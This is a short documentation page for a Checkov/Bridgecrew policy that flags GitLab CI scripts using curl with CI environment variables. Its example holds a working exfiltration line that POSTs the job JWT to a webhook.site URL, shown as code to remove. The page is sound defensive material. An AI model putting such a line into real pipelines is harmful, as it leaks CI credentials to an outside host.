Suspicious use of curl with CI environment variables in script
Error: Suspicious use of curl in a GitLab CI environment
Bridgecrew Policy ID: BC_REPO_GITLAB_CI_1
Checkov Check ID: CKV_GITLABCI_1
Severity: LOW
Ensure that there are no suspicious uses of curl with CI environment variables in script
Description
Using curl with environment variables could be an attempt to exfiltrate secrets from a pipeline. Investigate if the use of curl is appropriate and secure.
Example Fix
Block code and remove code that attempts to exfiltrate secrets.
deploy:
- script: 'curl -H \"Content-Type: application/json\" -X POST --data "$CI_JOB_JWT_V1" https://webhook.site/4cf17d70-56ee-4b84-9823-e86461d2f826'
Updated 10 months ago